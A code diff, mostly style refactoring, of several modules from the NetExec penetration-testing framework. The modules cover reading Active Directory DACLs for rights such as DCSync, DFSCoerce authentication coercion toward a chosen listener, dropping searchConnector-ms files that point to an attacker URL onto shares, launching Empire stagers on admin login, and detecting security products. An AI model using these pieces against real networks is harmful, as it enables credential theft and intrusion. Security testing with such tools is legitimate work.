-TARGET The objects that we want to read or backup the DACLs, sepcified by its SamAccountName
+For example, if an object has particular rights because it belongs to a group, the module will not be able to see it directly, you have to check the group rights manually.
-TARGET_DN The object that we want to read or backup the DACL, specified by its DN (usefull to target the domain itself)
+TARGET The objects that we want to read or backup the DACLs, specified by its SamAccountName
+TARGET_DN The object that we want to read or backup the DACL, specified by its DN (useful to target the domain itself)
 PRINCIPAL The trustee that we want to filter on
 ACTION The action to realise on the DACL (read, backup)
 ACE_TYPE The type of ACE to read (Allowed or Denied)
 RIGHTS An interesting right to filter on ('FullControl', 'ResetPassword', 'WriteMembers', 'DCSync')
 RIGHTS_GUID A right GUID that specify a particular rights to filter on

+Based on the work of @_nwodtuhs and @BlWasp_.
 """
 self.context = context

+context.log.debug(f"module_options: {module_options}")

 if not module_options:
 context.log.fail("Select an option, example: -M daclread -o TARGET=Administrator ACTION=read")
-exit(1)
+sys.exit(1)

 if module_options and "TARGET" in module_options:
+context.log.debug("There is a target specified!")
 if re.search(r"^(.+)\/([^\/]+)$", module_options["TARGET"]) is not None:
 try:
-self.target_file = open(module_options["TARGET"], "r")
+self.target_file = open(module_options["TARGET"]) # noqa: SIM115
 self.target_sAMAccountName = None
-except Exception as e:
+except Exception:
 context.log.fail("The file doesn't exist or cannot be openned.")
 else:
+context.log.debug(f"Setting target_sAMAccountName to {module_options['TARGET']}")
 self.target_sAMAccountName = module_options["TARGET"]
 self.target_file = None
 self.target_DN = None
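For context, a hedged sketch of the TARGET handling in the hunk above: a value matching the path regex is treated as a file of targets, anything else as a single sAMAccountName. The function name and sample values below are illustrative only, not part of the module:

import re

def classify_target(value):
    # Same regex as the module: a string containing "/" looks like a file path.
    if re.search(r"^(.+)\/([^\/]+)$", value) is not None:
        return ("file", value)           # e.g. a list of targets, one per line
    return ("sAMAccountName", value)     # e.g. a single account name

print(classify_target("/tmp/targets.txt"))  # ('file', '/tmp/targets.txt')
print(classify_target("Administrator"))     # ('sAMAccountName', 'Administrator')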
@@ -264,11 +273,8 @@ class NXCModule:
 self.filename = None

 def on_login(self, context, connection):
-"""
+"""On a successful LDAP login we perform a search for the targets' SID, their Security Descriptors and the principal's SID if there is one specified"""
-On a successful LDAP login we perform a search for the targets' SID, their Security Decriptors and the principal's SID if there is one specified
+context.log.highlight("Be careful, this module cannot read the DACLS recursively.")
-"""

-context.log.highlight("Be carefull, this module cannot read the DACLS recursively.")
 self.baseDN = connection.ldapConnection._baseDN
 self.ldap_session = connection.ldapConnection

@@ -279,20 +285,16 @@ class NXCModule:
 self.principal_sid = format_sid(
 self.ldap_session.search(
 searchBase=self.baseDN,
-searchFilter="(sAMAccountName=%s)" % escape_filter_chars(_lookedup_principal),
+searchFilter=f"(sAMAccountName={escape_filter_chars(_lookedup_principal)})",
 attributes=["objectSid"],
-)[0][
+)[0][1][0][1][0]
-1
-][0][
-1
-][0]
 )
-context.log.highlight("Found principal SID to filter on: %s" % self.principal_sid)
+context.log.highlight(f"Found principal SID to filter on: {self.principal_sid}")
-except Exception as e:
+except Exception:
-context.log.fail("Principal SID not found in LDAP (%s)" % _lookedup_principal)
+context.log.fail(f"Principal SID not found in LDAP ({_lookedup_principal})")
-exit(1)
+sys.exit(1)

-# Searching for the targets SID and their Security Decriptors
+# Searching for the targets SID and their Security Descriptors
 # If there is only one target
 if (self.target_sAMAccountName or self.target_DN) and self.target_file is None:
 # Searching for target account with its security descriptor
@@ -302,10 +304,10 @@ class NXCModule:
 self.target_principal_dn = self.target_principal[0]
 self.principal_raw_security_descriptor = str(self.target_principal[1][0][1][0]).encode("latin-1")
 self.principal_security_descriptor = ldaptypes.SR_SECURITY_DESCRIPTOR(data=self.principal_raw_security_descriptor)
-context.log.highlight("Target principal found in LDAP (%s)" % self.target_principal[0])
+context.log.highlight(f"Target principal found in LDAP ({self.target_principal[0]})")
-except Exception as e:
+except Exception:
-context.log.fail("Target SID not found in LDAP (%s)" % self.target_sAMAccountName)
+context.log.fail(f"Target SID not found in LDAP ({self.target_sAMAccountName})")
-exit(1)
+sys.exit(1)

 if self.action == "read":
 self.read(context)
@@ -324,9 +326,9 @@ class NXCModule:
 self.target_principal_dn = self.target_principal[0]
 self.principal_raw_security_descriptor = str(self.target_principal[1][0][1][0]).encode("latin-1")
 self.principal_security_descriptor = ldaptypes.SR_SECURITY_DESCRIPTOR(data=self.principal_raw_security_descriptor)
-context.log.highlight("Target principal found in LDAP (%s)" % self.target_sAMAccountName)
+context.log.highlight(f"Target principal found in LDAP ({self.target_sAMAccountName})")
-except Exception as e:
+except Exception:
-context.log.fail("Target SID not found in LDAP (%s)" % self.target_sAMAccountName)
+context.log.fail(f"Target SID not found in LDAP ({self.target_sAMAccountName})")
 continue

 if self.action == "read":
@@ -339,7 +341,6 @@ class NXCModule:
 def read(self, context):
 parsed_dacl = self.parse_dacl(context, self.principal_security_descriptor["Dacl"])
 self.print_parsed_dacl(context, parsed_dacl)
-return

 # Permits to export the DACL of the targets
 # This function is called before any writing action (write, remove or restore)
@@ -348,7 +349,7 @@ class NXCModule:
 backup["sd"] = binascii.hexlify(self.principal_raw_security_descriptor).decode("latin-1")
 backup["dn"] = str(self.target_principal_dn)
 if not self.filename:
-self.filename = "dacledit-%s-%s.bak" % (
+self.filename = "dacledit-{}-{}.bak".format(
 datetime.datetime.now().strftime("%Y%m%d-%H%M%S"),
 self.target_sAMAccountName,
 )
@@ -366,7 +367,7 @@ class NXCModule:
 _lookedup_principal = self.target_sAMAccountName
 target = self.ldap_session.search(
 searchBase=self.baseDN,
-searchFilter="(sAMAccountName=%s)" % escape_filter_chars(_lookedup_principal),
+searchFilter=f"(sAMAccountName={escape_filter_chars(_lookedup_principal)})",
 attributes=["nTSecurityDescriptor"],
 searchControls=controls,
 )
@@ -374,61 +375,54 @@ class NXCModule:
 _lookedup_principal = self.target_DN
 target = self.ldap_session.search(
 searchBase=self.baseDN,
-searchFilter="(distinguishedName=%s)" % _lookedup_principal,
+searchFilter=f"(distinguishedName={_lookedup_principal})",
 attributes=["nTSecurityDescriptor"],
 searchControls=controls,
 )
 try:
 self.target_principal = target[0]
-except Exception as e:
+except Exception:
-context.log.fail("Principal not found in LDAP (%s), probably an LDAP session issue." % _lookedup_principal)
+context.log.fail(f"Principal not found in LDAP ({_lookedup_principal}), probably an LDAP session issue.")
-exit(0)
+sys.exit(0)

-# Attempts to retieve the SID and Distinguisehd Name from the sAMAccountName
+# Attempts to retrieve the SID and Distinguisehd Name from the sAMAccountName
 # Not used for the moment
 # - samname : a sAMAccountName
 def get_user_info(self, context, samname):
 self.ldap_session.search(
 searchBase=self.baseDN,
-searchFilter="(sAMAccountName=%s)" % escape_filter_chars(samname),
+searchFilter=f"(sAMAccountName={escape_filter_chars(samname)})",
 attributes=["objectSid"],
 )
 try:
 dn = self.ldap_session.entries[0].entry_dn
 sid = format_sid(self.ldap_session.entries[0]["objectSid"].raw_values[0])
 return dn, sid
-except Exception as e:
+except Exception:
-context.log.fail("User not found in LDAP: %s" % samname)
+context.log.fail(f"User not found in LDAP: {samname}")
 return False

 # Attempts to resolve a SID and return the corresponding samaccountname
 # - sid : the SID to resolve
 def resolveSID(self, context, sid):
 # Tries to resolve the SID from the well known SIDs
-if sid in WELL_KNOWN_SIDS.keys():
+if sid in WELL_KNOWN_SIDS:
 return WELL_KNOWN_SIDS[sid]
 # Tries to resolve the SID from the LDAP domain dump
 else:
 try:
-dn = self.ldap_session.search(
+self.ldap_session.search(
 searchBase=self.baseDN,
-searchFilter="(objectSid=%s)" % sid,
+searchFilter=f"(objectSid={sid})",
 attributes=["sAMAccountName"],
-)[
+)[0][0]
-0
+return self.ldap_session.search(
-][0]
-samname = self.ldap_session.search(
 searchBase=self.baseDN,
-searchFilter="(objectSid=%s)" % sid,
+searchFilter=f"(objectSid={sid})",
 attributes=["sAMAccountName"],
-)[0][
+)[0][1][0][1][0]
-1
+except Exception:
-][0][
+context.log.debug(f"SID not found in LDAP: {sid}")
-1
-][0]
-return samname
-except Exception as e:
-context.log.debug("SID not found in LDAP: %s" % sid)
 return ""

 # Parses a full DACL
@@ -445,17 +439,12 @@ class NXCModule:

 # Parses an access mask to extract the different values from a simple permission
 # https://stackoverflow.com/questions/28029872/retrieving-security-descriptor-and-getting-number-for-filesystemrights
-# - fsr : the access mask to parse
+def parse_perms(self, access_mask):
-def parse_perms(self, fsr):
+perms = [PERM.name for PERM in SIMPLE_PERMISSIONS if (access_mask & PERM.value) == PERM.value]
-_perms = []
+# use bitwise NOT operator (~) and sum() function to clear the bits that have been processed
-for PERM in SIMPLE_PERMISSIONS:
+access_mask &= ~sum(PERM.value for PERM in SIMPLE_PERMISSIONS if (access_mask & PERM.value) == PERM.value)
-if (fsr & PERM.value) == PERM.value:
+perms += [PERM.name for PERM in ACCESS_MASK if access_mask & PERM.value]
-_perms.append(PERM.name)
+return perms
-fsr = fsr & (not PERM.value)
-for PERM in ACCESS_MASK:
-if fsr & PERM.value:
-_perms.append(PERM.name)
-return _perms

 # Parses a specified ACE and extract the different values (Flags, Access Mask, Trustee, ObjectType, InheritedObjectType)
 # - ace : the ACE to parse
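The rewritten parse_perms above first collects every simple permission whose bits are fully present, clears those bits, then reports the remaining individual flags. A self-contained sketch of that logic with stand-in enums (the values below are illustrative, not the module's real constants):

from enum import Enum

class SIMPLE_PERMISSIONS(Enum):
    FullControl = 0xF01FF
    Modify = 0x0301BF
    ReadAndExecute = 0x0200A9

class ACCESS_MASK(Enum):
    WriteOwner = 0x80000
    Delete = 0x10000

def parse_perms(access_mask):
    # Simple permissions whose full bit pattern is set in the mask
    perms = [p.name for p in SIMPLE_PERMISSIONS if (access_mask & p.value) == p.value]
    # Clear the bits that have been accounted for (bitwise NOT of their sum)
    access_mask &= ~sum(p.value for p in SIMPLE_PERMISSIONS if (access_mask & p.value) == p.value)
    # Whatever is left maps onto the fine-grained flags
    perms += [f.name for f in ACCESS_MASK if access_mask & f.value]
    return perms

print(parse_perms(0x0200A9 | 0x10000))  # ['ReadAndExecute', 'Delete']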
@@ -467,86 +456,59 @@ class NXCModule:
 "ACCESS_DENIED_ACE",
 "ACCESS_DENIED_OBJECT_ACE",
 ]:
-parsed_ace = {}
+_ace_flags = [FLAG.name for FLAG in ACE_FLAGS if ace.hasFlag(FLAG.value)]
-parsed_ace["ACE Type"] = ace["TypeName"]
+parsed_ace = {"ACE Type": ace["TypeName"], "ACE flags": ", ".join(_ace_flags) or "None"}
-# Retrieves ACE's flags
-_ace_flags = []
-for FLAG in ACE_FLAGS:
-if ace.hasFlag(FLAG.value):
-_ace_flags.append(FLAG.name)
-parsed_ace["ACE flags"] = ", ".join(_ace_flags) or "None"

 # For standard ACE
 # Extracts the access mask (by parsing the simple permissions) and the principal's SID
 if ace["TypeName"] in ["ACCESS_ALLOWED_ACE", "ACCESS_DENIED_ACE"]:
-parsed_ace["Access mask"] = "%s (0x%x)" % (
+access_mask = f"{', '.join(self.parse_perms(ace['Ace']['Mask']['Mask']))} (0x{ace['Ace']['Mask']['Mask']:x})"
-", ".join(self.parse_perms(ace["Ace"]["Mask"]["Mask"])),
+trustee_sid = f"{self.resolveSID(context, ace['Ace']['Sid'].formatCanonical()) or 'UNKNOWN'} ({ace['Ace']['Sid'].formatCanonical()})"
-ace["Ace"]["Mask"]["Mask"],
+parsed_ace = {
-)
+"Access mask": access_mask,
-parsed_ace["Trustee (SID)"] = "%s (%s)" % (
+"Trustee (SID)": trustee_sid
-self.resolveSID(context, ace["Ace"]["Sid"].formatCanonical()) or "UNKNOWN",
+}
-ace["Ace"]["Sid"].formatCanonical(),
+elif ace["TypeName"] in ["ACCESS_ALLOWED_OBJECT_ACE", "ACCESS_DENIED_OBJECT_ACE"]: # for object-specific ACE
-)

-# For object-specific ACE
-elif ace["TypeName"] in [
-"ACCESS_ALLOWED_OBJECT_ACE",
-"ACCESS_DENIED_OBJECT_ACE",
-]:
 # Extracts the mask values. These values will indicate the ObjectType purpose
-_access_mask_flags = []
+access_mask_flags = [FLAG.name for FLAG in ALLOWED_OBJECT_ACE_MASK_FLAGS if ace["Ace"]["Mask"].hasPriv(FLAG.value)]
-for FLAG in ALLOWED_OBJECT_ACE_MASK_FLAGS:
+parsed_ace["Access mask"] = ", ".join(access_mask_flags)
-if ace["Ace"]["Mask"].hasPriv(FLAG.value):
-_access_mask_flags.append(FLAG.name)
-parsed_ace["Access mask"] = ", ".join(_access_mask_flags)
 # Extracts the ACE flag values and the trusted SID
-_object_flags = []
+object_flags = [FLAG.name for FLAG in OBJECT_ACE_FLAGS if ace["Ace"].hasFlag(FLAG.value)]
-for FLAG in OBJECT_ACE_FLAGS:
+parsed_ace["Flags"] = ", ".join(object_flags) or "None"
-if ace["Ace"].hasFlag(FLAG.value):
-_object_flags.append(FLAG.name)
-parsed_ace["Flags"] = ", ".join(_object_flags) or "None"
 # Extracts the ObjectType GUID values
 if ace["Ace"]["ObjectTypeLen"] != 0:
 obj_type = bin_to_string(ace["Ace"]["ObjectType"]).lower()
 try:
-parsed_ace["Object type (GUID)"] = "%s (%s)" % (
+parsed_ace["Object type (GUID)"] = f"{OBJECT_TYPES_GUID[obj_type]} ({obj_type})"
-OBJECT_TYPES_GUID[obj_type],
-obj_type,
-)
 except KeyError:
-parsed_ace["Object type (GUID)"] = "UNKNOWN (%s)" % obj_type
+parsed_ace["Object type (GUID)"] = f"UNKNOWN ({obj_type})"
 # Extracts the InheritedObjectType GUID values
 if ace["Ace"]["InheritedObjectTypeLen"] != 0:
 inh_obj_type = bin_to_string(ace["Ace"]["InheritedObjectType"]).lower()
 try:
-parsed_ace["Inherited type (GUID)"] = "%s (%s)" % (
+parsed_ace["Inherited type (GUID)"] = f"{OBJECT_TYPES_GUID[inh_obj_type]} ({inh_obj_type})"
-OBJECT_TYPES_GUID[inh_obj_type],
-inh_obj_type,
-)
 except KeyError:
-parsed_ace["Inherited type (GUID)"] = "UNKNOWN (%s)" % inh_obj_type
+parsed_ace["Inherited type (GUID)"] = f"UNKNOWN ({inh_obj_type})"
 # Extract the Trustee SID (the object that has the right over the DACL bearer)
-parsed_ace["Trustee (SID)"] = "%s (%s)" % (
+parsed_ace["Trustee (SID)"] = "{} ({})".format(
 self.resolveSID(context, ace["Ace"]["Sid"].formatCanonical()) or "UNKNOWN",
 ace["Ace"]["Sid"].formatCanonical(),
 )
+else: # if the ACE is not an access allowed
-else:
+context.log.debug(f"ACE Type ({ace['TypeName']}) unsupported for parsing yet, feel free to contribute")
-# If the ACE is not an access allowed
+_ace_flags = [FLAG.name for FLAG in ACE_FLAGS if ace.hasFlag(FLAG.value)]
-context.log.debug("ACE Type (%s) unsupported for parsing yet, feel free to contribute" % ace["TypeName"])
+parsed_ace = {
-parsed_ace = {}
+"ACE type": ace["TypeName"],
-parsed_ace["ACE type"] = ace["TypeName"]
+"ACE flags": ", ".join(_ace_flags) or "None",
-_ace_flags = []
+"DEBUG": "ACE type not supported for parsing by dacleditor.py, feel free to contribute",
-for FLAG in ACE_FLAGS:
+}
-if ace.hasFlag(FLAG.value):
-_ace_flags.append(FLAG.name)
-parsed_ace["ACE flags"] = ", ".join(_ace_flags) or "None"
-parsed_ace["DEBUG"] = "ACE type not supported for parsing by dacleditor.py, feel free to contribute"
 return parsed_ace

-# Prints a full DACL by printing each parsed ACE
-# - parsed_dacl : a parsed DACL from parse_dacl()
 def print_parsed_dacl(self, context, parsed_dacl):
+"""Prints a full DACL by printing each parsed ACE

+parsed_dacl : a parsed DACL from parse_dacl()
+"""
 context.log.debug("Printing parsed DACL")
 i = 0
 # If a specific right or a specific GUID has been specified, only the ACE with this right will be printed
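One small idiom worth noting in the rewritten parse_ace above: ", ".join(flags) or "None" prints "None" when no flag matched. Illustrative values only:

ace_flags = []
print(", ".join(ace_flags) or "None")   # None
ace_flags = ["CONTAINER_INHERIT_ACE", "INHERITED_ACE"]
print(", ".join(ace_flags) or "None")   # CONTAINER_INHERIT_ACE, INHERITED_ACE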
@@ -554,6 +516,8 @@ class NXCModule:
 # If a principal has been specified, only the ACE where he is the trustee will be printed
 for parsed_ace in parsed_dacl:
 print_ace = True
+context.log.debug(f"{parsed_ace=}, {self.rights=}, {self.rights_guid=}, {self.ace_type=}, {self.principal_sid=}")

 # Filter on specific rights
 if self.rights is not None:
 try:
@@ -566,7 +530,7 @@ class NXCModule:
 if (self.rights == "ResetPassword") and (("Object type (GUID)" not in parsed_ace) or (RIGHTS_GUID.ResetPassword.value not in parsed_ace["Object type (GUID)"])):
 print_ace = False
 except Exception as e:
-context.log.fail("Error filtering ACE, probably because of ACE type unsupported for parsing yet (%s)" % e)
+context.log.debug(f"Error filtering with {parsed_ace=} and {self.rights=}, probably because of ACE type unsupported for parsing yet ({e})")

 # Filter on specific right GUID
 if self.rights_guid is not None:
@@ -574,7 +538,7 @@ class NXCModule:
 if ("Object type (GUID)" not in parsed_ace) or (self.rights_guid not in parsed_ace["Object type (GUID)"]):
 print_ace = False
 except Exception as e:
-context.log.fail("Error filtering ACE, probably because of ACE type unsupported for parsing yet (%s)" % e)
+context.log.debug(f"Error filtering with {parsed_ace=} and {self.rights_guid=}, probably because of ACE type unsupported for parsing yet ({e})")

 # Filter on ACE type
 if self.ace_type == "allowed":
@@ -582,13 +546,13 @@ class NXCModule:
 if ("ACCESS_ALLOWED_OBJECT_ACE" not in parsed_ace["ACE Type"]) and ("ACCESS_ALLOWED_ACE" not in parsed_ace["ACE Type"]):
 print_ace = False
 except Exception as e:
-context.log.fail("Error filtering ACE, probably because of ACE type unsupported for parsing yet (%s)" % e)
+context.log.debug(f"Error filtering with {parsed_ace=} and {self.ace_type=}, probably because of ACE type unsupported for parsing yet ({e})")
 else:
 try:
 if ("ACCESS_DENIED_OBJECT_ACE" not in parsed_ace["ACE Type"]) and ("ACCESS_DENIED_ACE" not in parsed_ace["ACE Type"]):
 print_ace = False
 except Exception as e:
-context.log.fail("Error filtering ACE, probably because of ACE type unsupported for parsing yet (%s)" % e)
+context.log.debug(f"Error filtering with {parsed_ace=} and {self.ace_type=}, probably because of ACE type unsupported for parsing yet ({e})")

 # Filter on trusted principal
 if self.principal_sid is not None:
@@ -596,7 +560,7 @@ class NXCModule:
 if self.principal_sid not in parsed_ace["Trustee (SID)"]:
 print_ace = False
 except Exception as e:
-context.log.fail("Error filtering ACE, probably because of ACE type unsupported for parsing yet (%s)" % e)
+context.log.debug(f"Error filtering with {parsed_ace=} and {self.principal_sid=}, probably because of ACE type unsupported for parsing yet ({e})")
 if print_ace:
 self.context.log.highlight("%-28s" % "ACE[%d] info" % i)
 self.print_parsed_ace(parsed_ace)

@@ -1,6 +1,3 @@
-#!/usr/bin/env python3
-# -*- coding: utf-8 -*-

 from impacket import system_errors
 from impacket.dcerpc.v5 import transport
 from impacket.dcerpc.v5.ndr import NDRCALL
@@ -23,9 +20,7 @@ class NXCModule:
 self.listener = None

 def options(self, context, module_options):
-"""
+"""LISTENER Listener Address (defaults to 127.0.0.1)"""
-LISTENER Listener Address (defaults to 127.0.0.1)
-"""
 self.listener = "127.0.0.1"
 if "LISTENER" in module_options:
 self.listener = module_options["LISTENER"]
@@ -64,13 +59,9 @@ class DCERPCSessionError(DCERPCException):
 if key in system_errors.ERROR_MESSAGES:
 error_msg_short = system_errors.ERROR_MESSAGES[key][0]
 error_msg_verbose = system_errors.ERROR_MESSAGES[key][1]
-return "DFSNM SessionError: code: 0x%x - %s - %s" % (
+return f"DFSNM SessionError: code: 0x{self.error_code:x} - {error_msg_short} - {error_msg_verbose}"
-self.error_code,
-error_msg_short,
-error_msg_verbose,
-)
 else:
-return "DFSNM SessionError: unknown error code: 0x%x" % self.error_code
+return f"DFSNM SessionError: unknown error code: 0x{self.error_code:x}"


 ################################################################################
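A hedged sketch of the error formatting adopted above, with a made-up error table standing in for impacket's system_errors.ERROR_MESSAGES:

ERROR_MESSAGES = {
    0x00000005: ("ERROR_ACCESS_DENIED", "Access is denied."),
}

def format_session_error(error_code):
    if error_code in ERROR_MESSAGES:
        short, verbose = ERROR_MESSAGES[error_code]
        return f"DFSNM SessionError: code: 0x{error_code:x} - {short} - {verbose}"
    return f"DFSNM SessionError: unknown error code: 0x{error_code:x}"

print(format_session_error(0x5))     # DFSNM SessionError: code: 0x5 - ERROR_ACCESS_DENIED - Access is denied.
print(format_session_error(0xdead))  # DFSNM SessionError: unknown error code: 0xdead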
@@ -119,21 +110,20 @@ class TriggerAuth:
 if doKerberos:
 rpctransport.set_kerberos(doKerberos, kdcHost=dcHost)
 # if target:
-# rpctransport.setRemoteHost(target)

 rpctransport.setRemoteHost(target)
 dce = rpctransport.get_dce_rpc()
-nxc_logger.debug("[-] Connecting to %s" % r"ncacn_np:%s[\PIPE\netdfs]" % target)
+nxc_logger.debug("[-] Connecting to {}".format(r"ncacn_np:%s[\PIPE\netdfs]") % target)
 try:
 dce.connect()
 except Exception as e:
-nxc_logger.debug("Something went wrong, check error status => %s" % str(e))
+nxc_logger.debug(f"Something went wrong, check error status => {e!s}")
-return
+return None
 try:
 dce.bind(uuidtup_to_bin(("4FC742E0-4A10-11CF-8273-00AA004AE673", "3.0")))
 except Exception as e:
-nxc_logger.debug("Something went wrong, check error status => %s" % str(e))
+nxc_logger.debug(f"Something went wrong, check error status => {e!s}")
-return
+return None
 nxc_logger.debug("[+] Successfully bound!")
 return dce

@@ -141,13 +131,12 @@ class TriggerAuth:
 nxc_logger.debug("[-] Sending NetrDfsRemoveStdRoot!")
 try:
 request = NetrDfsRemoveStdRoot()
-request["ServerName"] = "%s\x00" % listener
+request["ServerName"] = f"{listener}\x00"
 request["RootShare"] = "test\x00"
 request["ApiFlags"] = 1
 if self.args.verbose:
 nxc_logger.debug(request.dump())
-# logger.debug(request.dump())
+dce.request(request)
-resp = dce.request(request)

 except Exception as e:
 nxc_logger.debug(e)

@@ -1,6 +1,3 @@
-#!/usr/bin/env python3
-# -*- coding: utf-8 -*-

 import ntpath
 import tempfile

@@ -47,22 +44,21 @@ class NXCModule:
 self.file_path = ntpath.join("\\", f"{self.filename}.searchConnector-ms")
 if not self.cleanup:
 self.scfile_path = f"{tempfile.gettempdir()}/{self.filename}.searchConnector-ms"
-scfile = open(self.scfile_path, "w")
+with open(self.scfile_path, "w") as scfile:
 scfile.truncate(0)
 scfile.write('<?xml version="1.0" encoding="UTF-8"?>')
-scfile.write("<searchConnectorDescription" ' xmlns="http://schemas.microsoft.com/windows/2009/searchConnector">')
+scfile.write("<searchConnectorDescription" ' xmlns="http://schemas.microsoft.com/windows/2009/searchConnector">') # noqa ISC001
 scfile.write("<description>Microsoft Outlook</description>")
 scfile.write("<isSearchOnlyItem>false</isSearchOnlyItem>")
 scfile.write("<includeInStartMenuScope>true</includeInStartMenuScope>")
 scfile.write(f"<iconReference>{self.url}/0001.ico</iconReference>")
 scfile.write("<templateInfo>")
 scfile.write("<folderType>{91475FE5-586B-4EBA-8D75-D17434B8CDF6}</folderType>")
 scfile.write("</templateInfo>")
 scfile.write("<simpleLocation>")
-scfile.write("<url>{}</url>".format(self.url))
+scfile.write(f"<url>{self.url}</url>")
 scfile.write("</simpleLocation>")
 scfile.write("</searchConnectorDescription>")
-scfile.close()

 def on_login(self, context, connection):
 shares = connection.shares()
@@ -74,13 +70,12 @@ class NXCModule:
 with open(self.scfile_path, "rb") as scfile:
 try:
 connection.conn.putFile(share["name"], self.file_path, scfile.read)
-context.log.success(f"[OPSEC] Created {self.filename}.searchConnector-ms" f" file on the {share['name']} share")
+context.log.success(f"[OPSEC] Created {self.filename}.searchConnector-ms file on the {share['name']} share")
 except Exception as e:
-context.log.exception(e)
+context.log.fail(f"Error writing {self.filename}.searchConnector-ms file on the {share['name']} share: {e}")
-context.log.fail(f"Error writing {self.filename}.searchConnector-ms file" f" on the {share['name']} share: {e}")
 else:
 try:
 connection.conn.deleteFile(share["name"], self.file_path)
-context.log.success(f"Deleted {self.filename}.searchConnector-ms file on the" f" {share['name']} share")
+context.log.success(f"Deleted {self.filename}.searchConnector-ms file on the {share['name']} share")
 except Exception as e:
-context.log.fail(f"[OPSEC] Error deleting {self.filename}.searchConnector-ms" f" file on share {share['name']}: {e}")
+context.log.fail(f"[OPSEC] Error deleting {self.filename}.searchConnector-ms file on share {share['name']}: {e}")

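The upload above hands scfile.read to putFile, which pulls the payload chunk by chunk through a read(n)-style callback. A minimal sketch of that callback pattern with a stand-in for connection.conn.putFile (the helper name and share path below are made up):

import tempfile

def fake_put_file(share, remote_path, read_callback):
    # Drain the callback exactly the way a putFile-style API would
    total = 0
    while chunk := read_callback(4096):   # same contract as a file object's read()
        total += len(chunk)
    print(f"uploaded {total} bytes to {share}{remote_path}")

with tempfile.NamedTemporaryFile("w+b") as f:
    f.write(b"<searchConnectorDescription/>")
    f.seek(0)
    fake_put_file("C$", "\\drop.searchConnector-ms", f.read)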
@@ -1,15 +1,7 @@
-#!/usr/bin/env python3
-# -*- coding: utf-8 -*-

 import sys
 import requests
 from requests import ConnectionError

-# The following disables the InsecureRequests warning and the 'Starting new HTTPS connection' log message
-from requests.packages.urllib3.exceptions import InsecureRequestWarning

-requests.packages.urllib3.disable_warnings(InsecureRequestWarning)


 class NXCModule:
 """
@@ -38,7 +30,7 @@ class NXCModule:

 api_proto = "https" if "SSL" in module_options else "http"

-obfuscate = True if "OBFUSCATE" in module_options else False
+obfuscate = "OBFUSCATE" in module_options
 # we can use commands instead of backslashes - this is because Linux and OSX treat them differently
 default_obfuscation = "Token,All,1"
 obfuscate_cmd = module_options["OBFUSCATE_CMD"] if "OBFUSCATE_CMD" in module_options else default_obfuscation
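A hedged sketch of the option handling in the hunk above, pulled out as a stand-alone function so the defaults are visible (the function name is illustrative; module_options is the dictionary NetExec passes to options()):

def parse_empire_options(module_options):
    return {
        "api_proto": "https" if "SSL" in module_options else "http",
        "obfuscate": "OBFUSCATE" in module_options,
        "obfuscate_cmd": module_options.get("OBFUSCATE_CMD", "Token,All,1"),
    }

print(parse_empire_options({}))
# {'api_proto': 'http', 'obfuscate': False, 'obfuscate_cmd': 'Token,All,1'}
print(parse_empire_options({"SSL": "", "OBFUSCATE": ""}))
# {'api_proto': 'https', 'obfuscate': True, 'obfuscate_cmd': 'Token,All,1'}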
@@ -100,7 +92,7 @@ class NXCModule:
 verify=False,
 )
 except ConnectionError:
-context.log.fail(f"Unable to request stager from Empire's RESTful API")
+context.log.fail("Unable to request stager from Empire's RESTful API")
 sys.exit(1)

 if stager_response.status_code not in [200, 201]:
@@ -111,7 +103,6 @@ class NXCModule:
 sys.exit(1)

 context.log.debug(f"Response Code: {stager_response.status_code}")
-# context.log.debug(f"Response Content: {stager_response.text}")

 stager_create_data = stager_response.json()
 context.log.debug(f"Stager data: {stager_create_data}")
@@ -123,14 +114,13 @@ class NXCModule:
 verify=False,
 )
 context.log.debug(f"Response Code: {download_response.status_code}")
-# context.log.debug(f"Response Content: {download_response.text}")

 self.empire_launcher = download_response.text

 if download_response.status_code == 200:
 context.log.success(f"Successfully generated launcher for listener '{module_options['LISTENER']}'")
 else:
-context.log.fail(f"Something went wrong when retrieving stager Powershell command")
+context.log.fail("Something went wrong when retrieving stager Powershell command")

 def on_admin_login(self, context, connection):
 if self.empire_launcher:

@@ -1,6 +1,3 @@
-#!/usr/bin/env python3
-# -*- coding: utf-8 -*-

 # All credit to @an0n_r0
 # https://github.com/tothi/serviceDetector
 # Module by @mpgn_x64
@@ -30,7 +27,6 @@ class NXCModule:
 def options(self, context, module_options):
 """
 """
-pass

 def on_login(self, context, connection):
 target = self._get_target(connection)
@@ -62,15 +58,14 @@ class NXCModule:

 dce, _ = lsa.connect()
 policyHandle = lsa.open_policy(dce)
+try:
 for product in conf["products"]:
 for service in product["services"]:
-try:
 lsa.LsarLookupNames(dce, policyHandle, service["name"])
 context.log.info(f"Detected installed service on {connection.host}: {product['name']} {service['description']}")
 results.setdefault(product["name"], {"services": []})["services"].append(service)
-except:
+except Exception:
 pass

 except Exception as e:
 context.log.fail(str(e))
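The detection loop above accumulates hits with results.setdefault(...). A small illustration of that pattern with made-up detection data:

results = {}
detections = [
    ("Windows Defender", {"name": "WinDefend"}),
    ("Windows Defender", {"name": "Sense"}),
]
for product, service in detections:
    # Create the product entry on first sight, then append each detected service
    results.setdefault(product, {"services": []})["services"].append(service)

print(results)
# {'Windows Defender': {'services': [{'name': 'WinDefend'}, {'name': 'Sense'}]}}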
@@ -93,7 +88,7 @@ class NXCModule:

 def dump_results(self, results, remoteName, context):
 if not results:
-context.log.highlight(f"Found NOTHING!")
+context.log.highlight("Found NOTHING!")
 return

 for item, data in results.items():
@@ -148,7 +143,7 @@ class LsaLookupNames:
 """
 string_binding = string_binding or self.string_binding
 if not string_binding:
-raise NotImplemented("String binding must be defined")
+raise NotImplementedError("String binding must be defined")

 rpc_transport = transport.DCERPCTransportFactory(string_binding)

@@ -199,12 +194,11 @@ class LsaLookupNames:
 request["PolicyHandle"] = policyHandle
 request["Count"] = 1
 name1 = RPC_UNICODE_STRING()
-name1["Data"] = "NT Service\{}".format(service)
+name1["Data"] = f"NT Service\\{service}"
 request["Names"].append(name1)
 request["TranslatedSids"]["Sids"] = NULL
 request["LookupLevel"] = lsat.LSAP_LOOKUP_LEVEL.LsapLookupWksta
-resp = dce.request(request)
+return dce.request(request)
-return resp


 conf = {

@@ -0,0 +1,106 @@
+from impacket.dcerpc.v5 import transport, epm
+from impacket.http import AUTH_NTLM
+from impacket.dcerpc.v5.rpch import RPC_PROXY_INVALID_RPC_PORT_ERR, \
+RPC_PROXY_CONN_A1_0X6BA_ERR, RPC_PROXY_CONN_A1_404_ERR, \
+RPC_PROXY_RPC_OUT_DATA_404_ERR
+from impacket import uuid
+import requests
+
+
+class NXCModule:
+"""
+-------
+Module by @0xjbb, original code from Impacket rpcdump.py
